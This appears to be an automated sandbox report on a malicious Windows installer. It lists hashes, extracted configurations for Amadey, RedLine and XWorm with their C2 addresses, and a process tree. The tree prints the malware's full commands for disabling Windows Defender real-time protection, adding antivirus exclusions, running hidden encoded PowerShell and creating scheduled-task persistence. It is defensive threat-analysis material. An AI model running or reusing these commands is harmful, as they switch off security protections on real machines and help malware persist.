Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
  • submitted
    20-06-2024 13:36

General

  • Target

    setup.exe

  • Size

    1.8MB

  • MD5

    d405f5cfa352b7bc7fc151c189e691a3

  • SHA1

    0379a493153871773ac7bcf6b072b65e89623948

  • SHA256

    3bb992b1519a83ed99725ee87607f874c7554303b9979f5e91651a1f3788e91b

  • SHA512

    6f753693387c689dff3160ac8c34949f7b89c9475cb1548cf86738eb764723cb46851ed167403058491be882102651b0640efb185c5d5992862e06e1998e3cfc

  • SSDEEP

    49152:OV4oHOo7HGKVW57+gHEZCrm6fiYKTlqblN:OKvCGKE57+pCrm6fiHqJ

Malware Config

Extracted

Family

amadey

Version

8254624243

Botnet

e76b71

C2

http://77.91.77.81

Attributes
  • install_dir

    8254624243

  • install_file

    axplong.exe

  • strings_key

    90049e51fabf09df0d6748e0b271922e

  • url_paths

    /Kiru9gu/index.php

rc4.plain

Extracted

Family

redline

Botnet

newbild

C2

185.215.113.67:40960

Extracted

Family

xworm

Version

5.0

C2

195.2.71.70:7050

Mutex

9TFyquZ982szPcIh

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect Xworm Payload 1 IoCs
  • Detects Monster Stealer. 2 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Monster

    Monster is a Golang stealer that was discovered in 2024.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 7 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 24 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 49 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in System32 directory 11 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 19 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1216
    • C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
      "C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2676
      • C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe
        "C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2588
        • C:\Users\Admin\AppData\Local\Temp\onefile_2588_133633641902220000\stub.exe
          "C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:1640
      • C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe
        "C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe"
        3⤵
        • Executes dropped EXE
        PID:1776
      • C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe
        "C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1672
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1672 -s 52
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:1972
      • C:\Users\Admin\AppData\Local\Temp\1000025001\deep.exe
        "C:\Users\Admin\AppData\Local\Temp\1000025001\deep.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1032
        • C:\Users\Admin\AppData\Local\Temp\da_protected.exe
          "C:\Users\Admin\AppData\Local\Temp\da_protected.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks whether UAC is enabled
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of AdjustPrivilegeToken
          PID:1804
          • C:\Users\Admin\AppData\Local\Temp\plzmko.exe
            "C:\Users\Admin\AppData\Local\Temp\plzmko.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Modifies system certificate store
            PID:3044
            • C:\Users\Admin\AppData\Local\Temp\setup.exe
              setup.exe
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:2132
              • C:\Users\Admin\AppData\Local\Temp\setup-4c52fab9c66618e6\setup.exe
                "C:\Users\Admin\AppData\Local\Temp\setup-4c52fab9c66618e6\setup.exe"
                7⤵
                • Executes dropped EXE
                PID:544
      • C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
        "C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2060
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 84
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:1816
      • C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe
        "C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"
        3⤵
        • Executes dropped EXE
        PID:1876
      • C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe
        "C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1644
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          4⤵
            PID:2024
        • C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
          "C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Drops file in Windows directory
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2796
          • C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
            "C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Modifies system certificate store
            PID:2708
            • C:\Users\Admin\AppData\Local\Temp\1000005001\setup.exe
              "C:\Users\Admin\AppData\Local\Temp\1000005001\setup.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:1084
              • C:\Users\Admin\AppData\Local\Temp\7zS94D0.tmp\Install.exe
                .\Install.exe
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:2500
                • C:\Users\Admin\AppData\Local\Temp\7zS9859.tmp\Install.exe
                  .\Install.exe /dLVdidXYccg "385119" /S
                  7⤵
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Enumerates system info in registry
                  PID:1796
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                    8⤵
                      PID:2224
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                        9⤵
                          PID:2328
                          • C:\Windows\SysWOW64\cmd.exe
                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                            10⤵
                              PID:1772
                              • \??\c:\windows\SysWOW64\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                11⤵
                                  PID:2332
                            • C:\Windows\SysWOW64\forfiles.exe
                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                              9⤵
                                PID:2008
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                  10⤵
                                    PID:2776
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                      11⤵
                                        PID:2772
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                    9⤵
                                      PID:2348
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                        10⤵
                                          PID:2424
                                          • \??\c:\windows\SysWOW64\reg.exe
                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                            11⤵
                                              PID:1156
                                        • C:\Windows\SysWOW64\forfiles.exe
                                          forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                          9⤵
                                            PID:1432
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                              10⤵
                                                PID:2932
                                                • \??\c:\windows\SysWOW64\reg.exe
                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                  11⤵
                                                    PID:1048
                                              • C:\Windows\SysWOW64\forfiles.exe
                                                forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                9⤵
                                                  PID:308
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                    10⤵
                                                      PID:808
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                        11⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Drops file in System32 directory
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:904
                                                        • C:\Windows\SysWOW64\gpupdate.exe
                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                          12⤵
                                                            PID:1456
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                    8⤵
                                                      PID:2144
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                        9⤵
                                                          PID:584
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                            10⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Drops file in System32 directory
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2300
                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                              11⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2492
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /CREATE /TN "bRfJDuKmNsszhfPRJj" /SC once /ST 13:38:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF\KNGeknwcwbxZLbh\kvPMJpw.exe\" oU /upEdidfv 385119 /S" /V1 /F
                                                        8⤵
                                                        • Drops file in Windows directory
                                                        • Scheduled Task/Job: Scheduled Task
                                                        PID:908
                                            • C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:972
                                              • C:\Users\Admin\AppData\Local\Temp\onefile_972_133633642120932000\stub.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                PID:960
                                            • C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              PID:1196
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 64
                                                4⤵
                                                • Loads dropped DLL
                                                • Program crash
                                                PID:3040
                                            • C:\Users\Admin\AppData\Local\Temp\1000082001\quickaccesspopup.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1000082001\quickaccesspopup.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              PID:1708
                                        • C:\Windows\system32\taskeng.exe
                                          taskeng.exe {C2E0424D-A804-4558-B30A-DDF87BB88411} S-1-5-18:NT AUTHORITY\System:Service:
                                          1⤵
                                            PID:1136
                                            • C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF\KNGeknwcwbxZLbh\kvPMJpw.exe
                                              C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF\KNGeknwcwbxZLbh\kvPMJpw.exe oU /upEdidfv 385119 /S
                                              2⤵
                                              • Executes dropped EXE
                                              • Drops file in System32 directory
                                              • Modifies data under HKEY_USERS
                                              PID:2988
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                3⤵
                                                  PID:2344
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                    4⤵
                                                      PID:1216
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                        5⤵
                                                          PID:2896
                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                            6⤵
                                                              PID:2684
                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                          4⤵
                                                            PID:2468
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                              5⤵
                                                                PID:2576
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                  6⤵
                                                                    PID:2836
                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                4⤵
                                                                  PID:3048
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                    5⤵
                                                                      PID:3052
                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                        6⤵
                                                                          PID:3032
                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                      4⤵
                                                                        PID:1184
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                          5⤵
                                                                            PID:2216
                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                              6⤵
                                                                                PID:1540
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                            4⤵
                                                                              PID:1780
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                5⤵
                                                                                  PID:2308
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                    6⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Drops file in System32 directory
                                                                                    • Modifies data under HKEY_USERS
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2312
                                                                                    • C:\Windows\SysWOW64\gpupdate.exe
                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                      7⤵
                                                                                        PID:1824
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /CREATE /TN "ghJGyVhNv" /SC once /ST 05:24:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                3⤵
                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                PID:2424
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /run /I /tn "ghJGyVhNv"
                                                                                3⤵
                                                                                  PID:2664
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  schtasks /DELETE /F /TN "ghJGyVhNv"
                                                                                  3⤵
                                                                                    PID:2800
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                    3⤵
                                                                                      PID:2596
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                        4⤵
                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                        PID:2968
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                      3⤵
                                                                                        PID:1928
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                          4⤵
                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                          PID:1300
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /CREATE /TN "gUjALwiMi" /SC once /ST 06:45:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                        3⤵
                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                        PID:1876
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /run /I /tn "gUjALwiMi"
                                                                                        3⤵
                                                                                          PID:1568
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /DELETE /F /TN "gUjALwiMi"
                                                                                          3⤵
                                                                                            PID:2648
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                                                            3⤵
                                                                                              PID:2572
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                4⤵
                                                                                                  PID:2168
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                    5⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Drops file in System32 directory
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:1048
                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                      6⤵
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2664
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cksoItPsQhGrxIuH" /t REG_DWORD /d 0 /reg:32
                                                                                                3⤵
                                                                                                  PID:2848
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cksoItPsQhGrxIuH" /t REG_DWORD /d 0 /reg:32
                                                                                                    4⤵
                                                                                                    • Windows security bypass
                                                                                                    PID:2580
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cksoItPsQhGrxIuH" /t REG_DWORD /d 0 /reg:64
                                                                                                  3⤵
                                                                                                    PID:812
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cksoItPsQhGrxIuH" /t REG_DWORD /d 0 /reg:64
                                                                                                      4⤵
                                                                                                      • Windows security bypass
                                                                                                      PID:2824
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cksoItPsQhGrxIuH" /t REG_DWORD /d 0 /reg:32
                                                                                                    3⤵
                                                                                                      PID:1528
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cksoItPsQhGrxIuH" /t REG_DWORD /d 0 /reg:32
                                                                                                        4⤵
                                                                                                          PID:808
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cksoItPsQhGrxIuH" /t REG_DWORD /d 0 /reg:64
                                                                                                        3⤵
                                                                                                          PID:2116
